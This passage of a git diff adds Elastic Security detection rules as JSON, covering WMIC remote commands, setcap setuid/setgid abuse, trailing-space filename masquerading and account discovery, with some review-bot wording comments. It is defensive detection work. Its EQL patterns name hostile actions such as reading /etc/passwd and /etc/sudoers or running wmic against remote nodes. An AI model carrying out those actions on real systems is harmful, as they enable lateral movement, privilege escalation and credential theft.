"rule_id": "f5861570-e39a-4b8a-9259-abd39f84cb97", + "setup": "## Setup\n\nThe 'Audit Directory Service Access' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Access 
(Success,Failure)\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Active Directory", + "Use Case: Active Directory Monitoring", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1222", + "name": "File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/", + "subtechnique": [ + { + "id": "T1222.001", + "name": "Windows File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 3 + }, + "id": "f5861570-e39a-4b8a-9259-abd39f84cb97_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_3.json b/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_3.json new file mode 100644 index 00000000000..1d33a520a15 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f59668de-caa0-4b84-94c1-3a1549e1e798_3.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of wmic.exe to run commands on remote hosts. While this can be used by administrators legitimately, attackers can abuse this built-in utility to achieve lateral movement.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "WMIC Remote Command", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"WMIC.exe\" and\n process.args : \"*node:*\" and\n process.args : (\"call\", \"set\", \"get\") and\n not process.args : (\"*/node:localhost*\", \"*/node:\\\"127.0.0.1\\\"*\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f59668de-caa0-4b84-94c1-3a1549e1e798", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.006", + "name": "Windows Remote Management", + "reference": "https://attack.mitre.org/techniques/T1021/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + 
"reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "f59668de-caa0-4b84-94c1-3a1549e1e798_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_5.json b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_5.json new file mode 100644 index 00000000000..040e407190e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f5c005d3-4e17-48b0-9cd7-444d48857f97_5.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities via setcap. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to achieve persistence by creating malicious binaries, allowing them to maintain control over a compromised system with elevated permissions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Setcap setuid/setgid Capability Set", + "note": "## Triage and analysis\n\n### Investigating Setcap setuid/setgid Capability Set\n\nSetuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group.\n\nThreat actors can exploit these attributes to achieve persistence by creating malicious binaries, allowing them to maintain control over a compromised system with elevated permissions.\n\nThis rule monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities via setcap.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was targeted by the addition of the setuid/setgid capability through OSQuery.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, 
protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator that performed these actions for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.name == \"setcap\" and process.args : \"cap_set?id+ep\" and not process.parent.name in (\"jem\", \"vzctl\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f5c005d3-4e17-48b0-9cd7-444d48857f97", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.001", + "name": "Setuid and Setgid", + "reference": "https://attack.mitre.org/techniques/T1548/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "f5c005d3-4e17-48b0-9cd7-444d48857f97_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_3.json b/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_3.json new file mode 100644 index 00000000000..9127bddd363 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_3.json 
@@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same parent process name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_high_sum_by_parent", + "name": "Suspicious Windows Process Cluster Spawned by a Parent Process", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "f5d9d36d-7c30-4cdb-a856-9f653c13d4e0", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\nBefore you can enable this rule, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_4.json b/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_4.json new file mode 100644 index 00000000000..4eb6b4acd01 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_4.json 
@@ -0,0 +1,66 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same parent process name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "problem_child_high_sum_by_parent", + "name": "Suspicious Windows Process Cluster Spawned by a Parent Process", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "risk_score": 21, + "rule_id": "f5d9d36d-7c30-4cdb-a856-9f653c13d4e0", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\n**Before you can enable this rule**, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html). For example, you can check if your winlogbeat or Elastic Defend (the [default index pattern](https://docs.elastic.co/en/integrations/endpoint#logs) being `logs-endpoint*`) already has an ingest pipeline by navigating to `Data > Index Management`, finding the index (sometimes you need to toggle \"Include hidden indices\"), and checking the index's settings for a default or final [pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#set-default-pipeline).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n\n### Anomaly Detection Setup\n**Before you can enable this rule**, you'll need to enable the corresponding Anomaly Detection job. \n- Go to the Kibana homepage. 
Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your enriched Windows process events. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `winlogbeat-*` if you used Winlogbeat.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/problemchild/kibana/ml_module/problemchild-ml.json) configuration file, you will see a card for \"Living off the Land Attack Detection\" under \"Use preconfigured jobs\". Warning: if the ingest pipeline hasn't run for some reason, such as no eligible data in winlogbeat has come in yet, _you won't be able to see this card yet_. If that is the case, try troubleshooting the ingest pipeline, and if any ProblemChild predictions have been populated yet.\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection job and datafeed.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/" + } + ] + } + ], + "type": "machine_learning", + "version": 4 + }, + "id": "f5d9d36d-7c30-4cdb-a856-9f653c13d4e0_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_6.json b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_6.json new file mode 100644 index 00000000000..0e498a7bd4c --- /dev/null 
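Review bot: The `setup` text of f5d9d36d…_4.json tells the analyst to use "the ingest pipeline named `-problem_child_ingest_pipeline`", and that leading hyphen looks like an unfilled version prefix rather than a real pipeline name, so nobody following the guide can locate the pipeline by that string; the same text is carried in the `_3` version above. I would either put the name the package actually installs here or describe how to find it, e.g. "the ingest pipeline installed by the LotL Attack Detection package (filter the Ingest Pipelines list on `problem_child`)". The last troubleshooting bullet is also a fragment, "try troubleshooting the ingest pipeline, and if any ProblemChild predictions have been populated yet"; suggest "…troubleshoot the ingest pipeline and check whether any ProblemChild predictions have been populated yet." This is user-facing text rendered in the Security app, so wording errors reach every deployment of the rule.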
+++ b/packages/security_detection_engine/kibana/security_rule/f5fb4598-4f10-11ed-bdc3-0242ac120002_6.json 
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rules identifies a process created from an executable with a space appended to the end of the filename. This may indicate an attempt to masquerade a malicious file as benign to gain user execution. When a space is added to the end of certain files, the OS will execute the file according to it's true filetype instead of it's extension. Adversaries can hide a program's true filetype by changing the extension of the file. They can then add a space to the end of the name so that the OS automatically executes the file when it's double-clicked.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Masquerading Space After Filename", + "query": "process where host.os.type:(\"linux\",\"macos\") and\n event.type == \"start\" and\n (process.executable regex~ \"\"\"/[a-z0-9\\s_\\-\\\\./]+\\s\"\"\") and not\n process.name in (\"ls\", \"find\", \"grep\", \"xkbcomp\")\n", + "references": [ + "https://www.picussecurity.com/resource/blog/picus-10-critical-mitre-attck-techniques-t1036-masquerading" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f5fb4598-4f10-11ed-bdc3-0242ac120002", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to 
populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.006", + "name": "Space after Filename", + "reference": "https://attack.mitre.org/techniques/T1036/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "f5fb4598-4f10-11ed-bdc3-0242ac120002_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_3.json b/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_3.json new file mode 100644 index 00000000000..f5fb5865f9f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f638a66d-3bbf-46b1-a52c-ef6f39fb6caf_3.json 
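Review bot: The `description` of f5fb4598…_6.json has two grammar errors in user-facing text: "This rules identifies" and "according to it's true filetype instead of it's extension" (possessive `its`). Suggested: `"description": "This rule identifies a process created from an executable with a space appended to the end of the filename. … the OS will execute the file according to its true filetype instead of its extension. …"`. Separately, `index` lists `auditbeat-*` but `related_integrations` and the `Data Source:` tags only name Elastic Defend; if Auditbeat is an intended source it may be worth reflecting that in the tags as the sibling f638a66d rule in this commit does for Auditd Manager, and if not, the index pattern is dead weight.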
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Adversaries may use built-in applications to get a listing of local system or domain accounts and groups.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Account or Group Discovery via Built-In Tools", + "query": "process where event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and ( \n (process.name in (\"groups\", \"id\")) or \n (process.name == \"dscl\" and process.args : (\"/Active Directory/*\", \"/Users*\", \"/Groups*\")) or\n (process.name == \"dscacheutil\" and process.args in (\"user\", \"group\")) or\n (process.args in (\"/etc/passwd\", \"/etc/master.passwd\", \"/etc/sudoers\")) or\n (process.name == \"getent\" and process.args in (\"passwd\", \"group\"))\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "f638a66d-3bbf-46b1-a52c-ef6f39fb6caf", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + 
